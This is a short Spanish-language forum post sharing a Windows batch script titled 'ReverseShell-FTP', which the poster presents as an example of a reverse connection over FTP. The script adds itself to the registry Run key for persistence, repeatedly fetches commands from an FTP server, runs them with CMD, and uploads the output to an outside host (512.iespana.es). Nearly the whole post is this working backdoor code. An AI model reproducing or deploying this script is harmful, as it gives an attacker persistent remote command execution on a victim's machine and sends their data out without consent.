en el BHC hay un ejemplo de conexión inversa por ftp, también debe estar en "jugando con netcat" en el foro de hacking basico que puse hace bastantes años.
::--- ReverseShell-FTP 1.4 by WHK ---
if not exist shellFTP.bat goto 2
copy shellFTP.bat "%homepath%\fdb.bat"
reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "fdb.bat"/t REG_SZ /d "at %homepath%\fdb.bat" /f
:2
set ip=127.0.0.1
echo o > command
echo %ip% >> command
echo quit >> command
echo quit >> command
echo o > ftp.dat
echo 512.iespana.es >> ftp.dat
echo user >> ftp.dat
echo pass >> ftp.dat
echo put verbose.txt >> ftp.dat
echo quit >> ftp.dat
echo quit >> ftp.dat
:1
ftp -s:command > comandos.txt
for /f %%i in (comandos.txt) do CMD /c %%i > verbose.txt
ftp -s:ftp.dat
ping -n 30 127.0.0.1
goto 1
::----------------------------------------
De todas formas esto no es un fallo, solamente obtiene los comandos generados por la salida del ftp y los procesa en un bat y la respuesta de la ejecución la manda por ftp a un hosting propio.
PD: este post debería ir en "
Scripting"